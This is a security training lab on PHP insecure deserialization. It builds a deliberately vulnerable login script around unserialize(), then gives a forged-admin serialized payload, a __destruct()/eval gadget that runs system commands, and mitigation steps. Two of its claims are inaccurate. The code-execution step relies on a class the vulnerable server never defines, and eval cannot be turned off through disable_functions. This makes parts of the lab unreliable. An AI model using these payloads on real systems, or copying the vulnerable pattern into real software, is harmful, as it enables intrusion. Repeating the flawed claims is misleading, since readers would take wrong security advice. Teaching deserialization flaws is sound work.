Exercise 51: Insecure Deserialization

Objective

Learn how to exploit Insecure Deserialization vulnerabilities to execute arbitrary code or manipulate application data by deserializing unsafe objects. Understand how to mitigate these vulnerabilities through proper validation, using secure deserialization libraries, and restricting deserialization of untrusted data.

---

Scenario

You are testing a web application that accepts serialized data from users for processing. Due to a lack of validation, an attacker can manipulate the serialized object to inject malicious code, which gets executed when deserialized by the server.

---

Lab Setup

Prerequisites:

• Basic knowledge of PHP and object-oriented programming.
• XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
• A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

1. PHP Script for Insecure Deserialization
   • Create a file deserialize.php: <?php class User { public $username; public $role = 'user'; public function __construct($username) { $this->username = $username; } public function isAdmin() { return $this->role === 'admin'; } } if (isset($_POST['data'])) { $data = $_POST['data']; $object = unserialize($data); if ($object->isAdmin()) { echo "<h2>Welcome, Admin!</h2>"; } else { echo "<h2>Welcome, " . htmlspecialchars($object->username) . "!</h2>"; } } ?> <h2>Login</h2> <form method="POST" action=""> <textarea name="data" rows="5" cols="50"></textarea><br> <button type="submit">Login</button> </form>
2. Running the Application
   • Start the Apache server.
   • Place deserialize.php in the web server’s root directory (htdocs for XAMPP).
   • Open http://localhost/deserialize.php in your browser.

---

Exploitation Steps

Step 1: Crafting a Malicious Payload

1. Generate a malicious serialized object to escalate privileges: <?php class User { public $username = "attacker"; public $role = "admin"; } echo serialize(new User()); ?>
2. Expected Output: O:4:"User":2:{s:8:"username";s:8:"attacker";s:4:"role";s:5:"admin";}
3. Paste this payload into the textarea on deserialize.php and click Login.

Expected Result:

• The attacker gains admin access and sees the message: Welcome, Admin!

Step 2: Executing Arbitrary Code (Advanced)

1. Modify the class to include a __destruct() method: <?php class Malicious { public $cmd = 'system("ls");'; public function __destruct() { eval($this->cmd); } } echo serialize(new Malicious()); ?>
2. Paste the serialized payload into the vulnerable form.

Expected Result:

• The server executes the ls command, listing directory files.

---

Solution and Prevention

Problem Analysis

• The application blindly deserializes user input, allowing attackers to manipulate objects and execute arbitrary code.

Fixing the Vulnerability

1. Avoid Unserialization of Untrusted Data
   • Do not use unserialize() on user-supplied input. Use safer alternatives like JSON: $data = json_decode($_POST['data'], true);
2. Implement Data Integrity Checks
   • Use cryptographic signatures to validate serialized data: $secret_key = 'secure_key'; $data = $_POST['data']; $signature = hash_hmac('sha256', $data, $secret_key); if (hash_equals($signature, $_POST['signature'])) { $object = unserialize($data); } else { die("Invalid data."); }
3. Use Secure Serialization Formats
   • Replace PHP serialization with safer formats like JSON: $object = json_decode($_POST['data']);
4. Implement Class Whitelisting
   • Use allowed_classes parameter in unserialize(): $object = unserialize($data, ['allowed_classes' => ['User']]);
5. Disable Dangerous PHP Functions
   • Disable functions like eval() and exec() in php.ini: disable_functions = eval, exec, system, passthru

---

Testing After Fix

1. Attempt to submit the malicious payload again.
2. Expected Result:
   • The application rejects the payload or processes it securely.
3. Try code execution via __destruct().
4. Expected Result:
   • The server prevents code execution.

---

Conclusion

In this lab, you exploited Insecure Deserialization to escalate privileges and execute arbitrary code. You also learned how to mitigate this vulnerability using secure serialization methods, data integrity checks, and input validation.